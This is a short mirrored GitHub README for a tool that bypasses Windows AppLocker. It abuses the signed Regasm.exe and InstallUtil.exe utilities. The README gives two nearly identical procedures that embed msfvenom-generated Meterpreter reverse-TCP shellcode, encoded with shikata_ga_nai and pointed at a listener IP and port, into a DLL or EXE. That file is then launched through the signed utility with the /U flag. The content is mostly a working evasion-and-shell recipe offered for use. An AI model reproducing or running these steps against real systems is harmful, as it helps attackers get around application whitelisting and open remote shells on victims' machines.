GitHub - Ivan1ee/Regasm_InstallUtil_ApplockerBypass: AppLocker Bypass With Regasm/InstallUtil
2019-08-01 02:47:21 Author: github.com(查看原文) 阅读量:212 收藏

Join GitHub today

GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together.

Sign up

AppLocker Bypass With Regasm/InstallUtil

AppLocker Bypass With Regasm/InstallUtil

  1. Modify shellcode.txt file and add ShellCode generated by msfvenom, Example:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.138 lport=4444 -e x8 6/shikata_ga_nai -i 15 -f csharp

  2. Generate Success, Name : RegasmBypass.dll

  3. Add the generated RegasmBypass.dll to Regasm.exe, Example: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U RegasmBypass.dll

  1. Modify shellcode.txt file and add ShellCode generated by msfvenom, Example:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.138 lport=4444 -e x8 6/shikata_ga_nai -i 15 -f csharp

  2. Generate Success, Name : InstallUBypass.exe

  3. Add the generated InstallUBypass.exe to InstallUtil.exe, Example: C:\Windows\Microsoft.NET\Framework\v2.0.30319\InstallUtil.exe /U InstallUBypass.exe


文章来源: https://github.com/Ivan1ee/Regasm_InstallUtil_ApplockerBypass
如有侵权请联系:admin#unsafe.sh